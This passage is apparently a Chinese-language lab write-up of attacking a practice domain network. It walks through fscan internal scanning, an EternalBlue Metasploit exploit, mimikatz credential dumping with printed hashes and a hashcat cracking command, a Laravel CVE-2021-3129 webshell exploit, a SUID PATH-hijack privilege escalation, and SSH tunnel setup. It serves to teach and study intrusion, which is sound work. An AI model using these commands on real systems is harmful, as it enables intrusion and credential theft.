gdm 1241 0.0 0.1 275736 4704 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-settings-daemon/gsd-screensaver-proxy
gdm 1244 0.0 0.2 321436 10212 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-settings-daemon/gsd-sharing
gdm 1248 0.0 0.2 390692 9692 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-settings-daemon/gsd-smartcard
gdm 1249 0.0 0.2 343052 9784 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-settings-daemon/gsd-sound
gdm 1255 0.0 1.2 599664 49012 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-settings-daemon/gsd-wacom
gdm 1265 0.0 0.1 218764 7860 tty1 Sl Apr09 0:00 /usr/lib/ibus/ibus-engine-simple
colord 1299 0.0 0.3 339576 15872 ? Ssl Apr09 0:00 /usr/lib/colord/colord
root 1667 0.0 0.1 110532 7456 ? Rs 00:02 0:00 sshd: root@pts/0
root 1669 0.0 0.1 76928 7912 ? Ss 00:02 0:00 /lib/systemd/systemd --user
root 1670 0.0 0.0 193708 2656 ? S 00:02 0:00 (sd-pam)
root 1681 0.0 0.0 0 0 ? I 00:02 0:00 [kworker/0:1-eve]
root 1772 0.0 0.1 29788 5112 pts/0 Ss 00:02 0:00 -bash
root 1838 0.0 0.0 0 0 ? I 00:06 0:00 [kworker/u256:0-]
root 1839 0.0 0.2 107696 8092 ? Ss 00:06 0:00 /usr/sbin/cupsd -l
root 1841 0.0 0.2 303664 10992 ? Ssl 00:06 0:00 /usr/sbin/cups-browsed
root 1919 0.0 0.0 4632 924 ? Ss 00:08 0:00 /bin/sh /usr/lib/apt/apt.systemd.daily install
root 1923 0.0 0.0 4632 1776 ? S 00:08 0:00 /bin/sh /usr/lib/apt/apt.systemd.daily lock_is_held install
root 1932 0.0 0.0 0 0 ? I 00:08 0:00 [kworker/1:0-mm_]
root 1955 99.8 3.3 246484 135684 ? RN 00:08 10:25 /usr/bin/python3 /usr/bin/unattended-upgrade
root 1973 0.0 0.0 0 0 ? I 00:12 0:00 [kworker/u256:1-]
root 1988 0.0 0.0 0 0 ? I 00:17 0:00 [kworker/0:0-eve]
root 2002 0.0 0.0 46776 3640 pts/0 R+ 00:18 0:00 ps aux并没有发现杀软。
查看防火墙与出站规则:
bash
root@ubuntu:~# iptables -L -v -n 2>/dev/null
Chain INPUT (policy ACCEPT 71 packets, 4966 bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 66 packets, 5906 bytes)
pkts bytes target prot opt in out source destination
root@ubuntu:~# ufw status 2>/dev/null
Status: inactive没有防火墙且出入自由。
下一步就是内网信息搜集了。
五、Fscan
通过 scp 命令上传 fscan 到服务器上,开始内网信息搜集:
bash
scp -i target /usr/local/bin/fscan root@192.168.111.20:/tmp/上传成功后,直接扫描:
bash
./fscan -h 192.168.52.0/24扫描的时候忘记把本机排除了 😛,花得时间略长。大家可以使用:
bash./fscan -h 192.168.52.0/24 -hn 192.168.52.10把本机排除。
结果:
start infoscan
(icmp) Target 192.168.52.10 is alive
(icmp) Target 192.168.52.20 is alive
(icmp) Target 192.168.52.30 is alive
[*] Icmp alive hosts len is: 3
192.168.52.10:81 open
192.168.52.10:80 open
192.168.52.20:22 open
192.168.52.10:22 open
192.168.52.30:135 open
192.168.52.30:445 open
192.168.52.30:139 open
192.168.52.10:6379 open
192.168.52.30:8080 open
192.168.52.20:8000 open
[*] alive ports len is: 10
start vulscan
[*] WebTitle http://192.168.52.10 code:502 len:584 title:502 Bad Gateway
[*] NetBios 192.168.52.30 PC1.whoamianony.org Windows 7 Professional 7601 Service Pack 1
[+] MS17-010 192.168.52.30 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统
[+] InfoScan http://192.168.52.30:8080 [通达OA]
[*] WebTitle http://192.168.52.10:81 code:200 len:17474 title:Laravel
[*] WebTitle http://192.168.52.20:8000 code:200 len:17474 title:Laravel
[+] InfoScan http://192.168.52.20:8000 [Laravel]
[+] InfoScan http://192.168.52.10:81 [Laravel]
[+] PocScan http://192.168.52.30:8080 tongda-user-session-disclosure
[+] Redis 192.168.52.10:6379 unauthorized file:/root/.ssh/authorized_keys
[+] Redis 192.168.52.10:6379 like can write /root/.ssh/
[+] Redis 192.168.52.10:6379 like can write /var/spool/cron/
[+] PocScan http://192.168.52.20:8000 poc-yaml-laravel-cve-2021-3129
[+] PocScan http://192.168.52.10:81 poc-yaml-laravel-cve-2021-3129
已完成 8/10 [-] ssh 192.168.52.10:22 root Aa1234. ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 8/10 [-] ssh 192.168.52.10:22 admin Admin@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 8/10 [-] ssh 192.168.52.10:22 admin 1qaz2wsx ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 9/10 [-] ssh 192.168.52.20:22 root root@111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 9/10 [-] ssh 192.168.52.20:22 root qwe123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 9/10 [-] ssh 192.168.52.20:22 root 123456789 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 10/10
[*] 扫描结束,耗时: 7m12.740113763s扫描忘记排除本主机虽然是失误,但是也让我看到了 fscan 的好用,之前分析的结果 fscan 一个扫描全出来了......,不过这也依赖于指纹库和漏洞库,并不是所有的情况都能涵盖的。
整理一下信息:
1、192.168.52.20
端口开放情况以及相关指纹信息:
192.168.52.20:22 open
192.168.52.20:8000 open
[*] WebTitle http://192.168.52.20:8000 code:200 len:17474 title:Laravel
[+] InfoScan http://192.168.52.20:8000 [Laravel]工具直接扫出来一个 cve:
[+] PocScan http://192.168.52.20:8000 poc-yaml-laravel-cve-2021-3129工具对 22 端口进行了弱密码爆破,但是没有结果:
已完成 9/10 [-] ssh 192.168.52.20:22 root root@111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 9/10 [-] ssh 192.168.52.20:22 root qwe123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 9/10 [-] ssh 192.168.52.20:22 root 123456789 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 10/102、192.168.52.30
端口开放情况:
192.168.52.30:135 open
192.168.52.30:445 open
192.168.52.30:139 open
192.168.52.30:8080 open相关指纹信息:
[*] NetBios 192.168.52.30 PC1.whoamianony.org Windows 7 Professional 7601 Service Pack 1
[*] WebTitle http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统 [+] InfoScan http://192.168.52.30:8080 [通达OA] - 可以判断这是一个域环境:
- 域名:
whoamianony.org - 本主机名:
PC1
- 域名:
- 8080 运行着一个"通达OA网络智能办公系统",可能存在 nday
扫描得到本主机存在永恒之蓝漏洞:
[+] MS17-010 192.168.52.30 (Windows 7 Professional 7601 Service Pack 1)综上,得到的关键信息:
六、永恒之蓝
MSF 有模块,可以直接尝试打永恒之蓝。
在此之前,先把代理建立好。
1、代理的建立
根据后续使用的 payload 是 reverse 还是 bind,我们视情况选择建立正向代理还是反向代理。
我选择的是"正向代理 + bind payload"。
建立 socks5 代理:
bash
ssh -i target -D 1080 -N -C root@192.168.111.202、ms17_010_eternalblue 模块
调出 MSF:
msfconsole设置全局代理:
setg Proxies socks5h://127.0.0.1:1080使用永恒之蓝模块:
msf > use exploit/windows/smb/ms17_010_eternalblue选择 payload:
msf exploit(windows/smb/ms17_010_eternalblue) > set payload payload/windows/x64/meterpreter/bind_tcp注意选择带 bind 的。
设置必要参数:
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.30直接跑模块:
run直接拿下主机的最高权限:
3、信息搜集
(1)网络信息
搜集一下基本的信息:
C:\Windows\system32>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : PC1
Primary Dns Suffix . . . . . . . : whoamianony.org
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : whoamianony.org
Ethernet adapter �������� 4:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
Physical Address. . . . . . . . . : 00-50-56-B1-7F-9E
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::a48c:626e:c838:265%23(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.93.20(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 721423401
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
DNS Servers . . . . . . . . . . . : 192.168.93.30
NetBIOS over Tcpip. . . . . . . . : Enabled
Ethernet adapter Npcap Loopback Adapter:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Npcap Loopback Adapter
Physical Address. . . . . . . . . : 02-00-4C-4F-4F-50
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::b461:ccad:e30f:81ba%22(Preferred)
Autoconfiguration IPv4 Address. . : 169.254.129.186(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 268566604
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
fec0:0:0:ffff::2%1
fec0:0:0:ffff::3%1
NetBIOS over Tcpip. . . . . . . . : Enabled
Ethernet adapter ��������:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-50-56-B1-54-16
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::858b:43d6:476c:6a3%11(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.52.30(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.52.2
DHCPv6 IAID . . . . . . . . . . . : 234884137
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
DNS Servers . . . . . . . . . . . : 192.168.52.2
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.{4DAEBDFD-0177-4691-8243-B73297E2F0FF}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter isatap.{55ECD929-FBB2-4D96-B43D-8FFEB14A169F}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter isatap.{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #3
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes发现这台机子也是双网卡的:
- 192.168.52.30
- 192.168.93.20
并且可以得知本机名是 PC1,域名是 whoamianony.org
而且根据:
DNS Servers . . . . . . . . . . . : 192.168.93.30这条信息,大致可以确认域控的 IP 就是 192.168.93.30(因为域环境中,DNS Server 通常就是域控)。
(2)域控确认
确认一下上面得到的结论:
powershell
C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001
C:\Windows\system32>net group "Domain Controllers" /domain
net group "Domain Controllers" /domain
The request will be processed at a domain controller for domain whoamianony.org.
System error 5 has occurred.
Access is denied.出现一个问题,明明我是最高权限,但是访问被拒绝了?
net ... /domain这类带/domain参数的命令,不是用本地 SYSTEM 身份去查询,而是用这台主机的计算机账户(Machine Account,例如WIN-XXXX$@whoamianony.org)的身份,通过网络向域控发起 LDAP/SAMR 查询。
切换回 MSF,用 MSF 自带的域收集模块 post/windows/gather/enum_domain
挂起当前的 session:
meterpreter > bg查看挂起的 session id:
使用模块并配置信息:
msf exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/enum_domain
msf post(windows/gather/enum_domain) > set session 1
session => 1跑:
run结果:
msf post(windows/gather/enum_domain) > run
[+] Domain FQDN: whoamianony.org
[+] Domain NetBIOS Name: WHOAMIANONY
[+] Domain Controller: DC.whoamianony.org (IP: 192.168.93.30)
[*] Post module execution completed域控为:DC.whoamianony.org(192.168.93.30)
(3)路由信息
查看本地的路由是否能到达域控:
C:\Windows\system32>route print
route print
===========================================================================
Interface List
23...00 50 56 b1 7f 9e ......Intel(R) PRO/1000 MT Network Connection #2
22...02 00 4c 4f 4f 50 ......Npcap Loopback Adapter
11...00 50 56 b1 54 16 ......Intel(R) PRO/1000 MT Network Connection
1...........................Software Loopback Interface 1
12...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
15...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
16...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #3
===========================================================================
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 192.168.52.2 192.168.52.30 266
127.0.0.0 255.0.0.0 On-link 127.0.0.1 306
127.0.0.1 255.255.255.255 On-link 127.0.0.1 306
127.255.255.255 255.255.255.255 On-link 127.0.0.1 306
169.254.0.0 255.255.0.0 On-link 169.254.129.186 286
169.254.129.186 255.255.255.255 On-link 169.254.129.186 286
169.254.255.255 255.255.255.255 On-link 169.254.129.186 286
192.168.52.0 255.255.255.0 On-link 192.168.52.30 266
192.168.52.30 255.255.255.255 On-link 192.168.52.30 266
192.168.52.255 255.255.255.255 On-link 192.168.52.30 266
192.168.93.0 255.255.255.0 On-link 192.168.93.20 266
192.168.93.20 255.255.255.255 On-link 192.168.93.20 266
192.168.93.255 255.255.255.255 On-link 192.168.93.20 266
224.0.0.0 240.0.0.0 On-link 127.0.0.1 306
224.0.0.0 240.0.0.0 On-link 192.168.52.30 266
224.0.0.0 240.0.0.0 On-link 192.168.93.20 266
224.0.0.0 240.0.0.0 On-link 169.254.129.186 286
255.255.255.255 255.255.255.255 On-link 127.0.0.1 306
255.255.255.255 255.255.255.255 On-link 192.168.52.30 266
255.255.255.255 255.255.255.255 On-link 192.168.93.20 266
255.255.255.255 255.255.255.255 On-link 169.254.129.186 286
===========================================================================
Persistent Routes:
Network Address Netmask Gateway Address Metric
0.0.0.0 0.0.0.0 192.168.52.2 Default
===========================================================================
IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
1 306 ::1/128 On-link
11 266 fe80::/64 On-link
23 266 fe80::/64 On-link
22 286 fe80::/64 On-link
11 266 fe80::858b:43d6:476c:6a3/128
On-link
23 266 fe80::a48c:626e:c838:265/128
On-link
22 286 fe80::b461:ccad:e30f:81ba/128
On-link
1 306 ff00::/8 On-link
11 266 ff00::/8 On-link
23 266 ff00::/8 On-link
22 286 ff00::/8 On-link
===========================================================================
Persistent Routes:
None根据路由信息知道,本机是可以直接访问域控的。
(4)搜集凭证
凭证搜集:
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
PC1$ WHOAMIANONY 3e6a3d8c713b4821eaa51aab25f52074 d8e1318a24c64b8fcc89dc8609b09af50342bacf
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
PC1$ WHOAMIANONY %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol
;
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
pc1$ whoamianony.org %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f
>[ol;
pc1$ WHOAMIANONY.ORG %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f
>[ol;只搜集到本机的域内机器账户的凭证信息,并没有和域内管理员账户。
再多试几个命令(这里尝试了多个凭证抓取命令,下面仅展示有效的那条):
meterpreter > kiwi_cmd "lsadump::cache"
Domain : PC1
SysKey : fd4639f4e27c79683ae9fee56b44393f
Local name : PC1 ( S-1-5-21-1982601180-2087634876-2293013296 )
Domain name : WHOAMIANONY ( S-1-5-21-1315137663-3706837544-1429009142 )
Domain FQDN : whoamianony.org
Policy subsystem is : 1.11
LSA Key(s) : 1, default {c4f0262f-f9ba-5833-89e5-1264beb97c37}
[00] {c4f0262f-f9ba-5833-89e5-1264beb97c37} 12ec51d5510d2e28b5f273a98a547e21ceec081867af5348f219b08215f27558
* Iteration is set to default (10240)
[NL$1 - 2021/2/22 18:53:27]
RID : 00000458 (1112)
User : WHOAMIANONY\bunny
MsCacheV2 : 00dd17d44798d1ac5f335365db696d1e
[NL$2 - 2025/9/18 17:05:27]
RID : 000001f4 (500)
User : WHOAMIANONY\Administrator
MsCacheV2 : 2f44261182b156fe4e2cb03b39925b72聚焦:
[NL$2 - 2025/9/18 17:05:27]
RID : 000001f4 (500)
User : WHOAMIANONY\Administrator
MsCacheV2 : 2f44261182b156fe4e2cb03b39925b72RID 500 是 Active Directory 里固定的内置域管理员账号(任何域的 Administrator 账户 RID 都是 500)。
MsCacheV2:Domain Cached Credentials v2(DCC2) 格式的缓存哈希。
| RID | 账户 |
|---|---|
| 500 | Administrator(内置管理员) |
| 501 | Guest |
| 502 | krbtgt(域控特有) |
| 512 | Domain Admins 组 |
现在知道:
- Username:Administrator
- MsCacheV2:2f44261182b156fe4e2cb03b39925b72
DCC2 无法直接用于登入账户,可以尝试本地撞一下 Hash(大家可以不用尝试,原因看下面写的"全局视角"):
bash
echo '$DCC2$10240#Administrator#2f44261182b156fe4e2cb03b39925b72' > /tmp/dcc2.hash
hashcat -m 2100 /tmp/dcc2.hash /usr/share/wordlists/rockyou.txt全局视角:虽然靶场密码通常很简单,但是本次的密码
Whoami2021并不在 rockyou 里,所以爆破不出来......
4、思路调整
再次更新一下靶场图:
域内还有其他机器吗?
查看一下 PC1 的 arp 缓存:
C:\Windows\system32>arp -a
arp -a
Interface: 192.168.52.30 --- 0xb
Internet Address Physical Address Type
192.168.52.10 00-50-56-b1-f7-eb dynamic
192.168.52.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
Interface: 169.254.129.186 --- 0x16
Internet Address Physical Address Type
169.254.255.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
255.255.255.255 ff-ff-ff-ff-ff-ff static
Interface: 192.168.93.20 --- 0x17
Internet Address Physical Address Type
192.168.93.30 00-50-56-b1-03-a1 dynamic
192.168.93.40 00-50-56-b1-a1-a3 dynamic
192.168.93.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static 找到了另一台:
尝试了一下 MSF 的扫描模块,都没有任何的结果,应该是防火墙的缘故,因此,我们可以先把目标转移到 192.168.52.20 这台主机上。
七、192.168.52.20
1、cve-2021-3129
192.168.52.20 的 8000 端口上运行着 http 服务,并且之前扫描结果显示,可能存在:
poc-yaml-laravel-cve-2021-3129搜了一下,github 上有师傅写了自动化利用脚本:
https://github.com/ajisai-babu/CVE-2021-3129-expClone 到本地:
git clone https://github.com/ajisai-babu/CVE-2021-3129-exp.git根据 Github 上的使用提示执行脚本:
❯ proxychains python CVE-2021-3129.py -u http://192.168.52.20:8000 --exp
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[✅]检测到漏洞![🚩]url: http://192.168.52.20:8000 [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[OK] 成功写入webshell, 访问地址 http://192.168.52.20:8000/shell.php , 密码 whoami注意:这里使用了
proxychains这个工具,其作用就是让后续命令走代理。这个工具在这就不介绍了,大家可以自行网络搜索该工具的用法。
用蚁剑(或者其他 Webshell 管理工具都可以)接管,先配置蚁剑的代理:
记得点击保存
添加数据:
接管成功。
2、信息搜集
www-data 权限并不高,而且发现一些常见的网络命令也没有:
bash
(www-data:/var/www/html) $ ip addr
/bin/sh: 1: ip: not found
(www-data:/var/www/html) $ ifconfig
/bin/sh: 1: ifconfig: not found也能收集一些信息:
(www-data:/var/www/html) $ hostname && cat /etc/issue && uname -a && cat /etc/hosts
8e172820ac78
Debian GNU/Linux 10 \n \l
Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64 GNU/Linux
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.2 8e172820ac78
(www-data:/var/www/html) $ cat /proc/version
Linux version 4.4.0-142-generic (buildd@lcy01-amd64-006) (gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.4) ) #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019
(www-data:/var/www/html) $ cat /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"这里能分析出这台主机是运行在 Docker 容器里面的。
为什么?
主要基于几个 Docker 部署时的典型特征:
hostname命令直接输出了8e172820ac78这个 12 位的十六进制字符串,这正是 Docker 在默认配置下会自动把容器 ID 的前 12 位设置为容器主机名的做法,在物理机或者普通虚拟机上很少会碰到这种随机的短十六进制主机名/etc/hosts文件里明确把 172.17.0.2 这个 IP 和主机名绑定在一起,而 172.17.0.0/16 网段是 Docker 默认 bridge 网络的标准子网(容器通常会从 172.17.0.2 开始分配地址)
除上述指纹特征之外,其实还有一个最关键的证据,内核和操作系统版本的不匹配:/etc/os-release 和 /etc/issue 显示的是 Debian 10(buster),但 uname -a、/proc/version 显示的却是 Ubuntu 14.04 系列构建出来的 4.4.0-142-generic 内核。
容器是不会自带内核的,它会共用主机的内核,也就是说,这是一台:Debian 10 容器 + 宿主机 Ubuntu 系内核 4.4.0-142。
而且,查看进程:
(www-data:/var/www/html) $ ps -p 1 -f
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 00:38 ? 00:00:00 apache2 -DFOREGROUND也能明显发现这不是一台正常的主机。
普通 Linux 主机的 PID 1 往往是
systemd、init之类;容器里则经常是sh、bash、apache2、nginx、php-fpm、python、业务启动脚本,或者一个很轻量的 supervisor。
3、权限提升
先尝试一下容器内部提权。
查看用户有哪些 sudo 权限:
bash
sudo -l输出:
(www-data:/var/www/html) $ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
sudo: no tty present and no askpass program specified并没有。
查看带 SUID 的文件:
bash
find / -type f -perm -04000 -ls 2>/dev/null(www-data:/var/www/html) $ find / -type f -perm -04000 -ls 2>/dev/null
25922 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
25969 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
26022 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
26012 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
25919 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
325013 156 -rwsr-xr-x 1 root root 157192 Jan 20 2021 /usr/bin/sudo
325077 20 -rwsr-xr-x 1 root root 16712 Feb 25 2021 /home/jobs/shell
25400 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /bin/mount
25418 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /bin/su
25424 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /bin/umount有明显的可疑对象:
/home/jobs/shell原因:家目录下的非官方目录(jobs)下有一个叫 shell 的可运行文件。
进入该目录,并查看目录下的文件:
(www-data:/var/www/html) $ cd /home/jobs
(www-data:/home/jobs) $ ls
demo.c
shell我们有理由猜测,demo.c 就是 shell 编译前的模样,查看:
bash
(www-data:/home/jobs) $ cat demo.c
#include<unistd.h>
void main()
{ setuid(0);
setgid(0);
system("ps");
}执行了一个系统命令,并且是相对路径(可能存在 PATH 提权路径)。
验证 shell 是否真的和我们所判断的一样,是 demo.c 编译后的版本,运行:
bash
(www-data:/home/jobs) $ ./shell
PID TTY TIME CMD
1 ? 00:00:00 apache2
125 ? 00:00:00 shell
126 ? 00:00:00 sh
127 ? 00:00:00 ps输出了进程,正如我们所料。
大家如果此处没输出可以多执行几次,这是 Webshell 固有的问题(缓存、时间限制等因素)。
查找可写目录:
bash
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u(www-data:/home/jobs) $ find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
dev/fd
dev/full
dev/fuse
dev/mqueue
dev/net
dev/null
dev/ptmx
dev/pts
dev/random
dev/shm
dev/stderr
dev/stdout
dev/tty
dev/urandom
dev/zero
lib/systemd
run/apache2
run/lock
sys/fs
tmp
var/cache
var/lock
var/log
var/tmp
var/www我选择的是 /tmp 目录,伪造 ps 程序:
bash
(www-data:/home/jobs) $ printf '#!/bin/bash\n/bin/bash -c 'whoami'\n' > /tmp/ps添加执行权限:
(www-data:/home/jobs) $ chmod +x /tmp/ps添加环境变量(注意要添加在当前环境变量的前面),并且执行 shell 程序:
bash
(www-data:/home/jobs) $ export PATH=/tmp:$PATH && ./shell
rootPATH 提权成功!
由于目前是 Webshell,无法反弹 root shell 回来,上面的只是在测试是否能通过 PATH 提权。
4、Meterpreter
Webshell 中无法直接实现交互式 root shell,打算让其上线 MSF。
先建立反向代理,这需要在跳板机上修改 ssh server 的配置文件。
登入:
ssh -i target root@192.168.111.20修改文件:
vim /etc/ssh/sshd_config在文件中找到:
#GatewayPorts no将其注释取消,并且值改成 yes:
GatewayPorts yes重启 ssh 服务:
bash
systemctl restart sshd退出登入,在 kali 中使用下述命令建立反向代理:
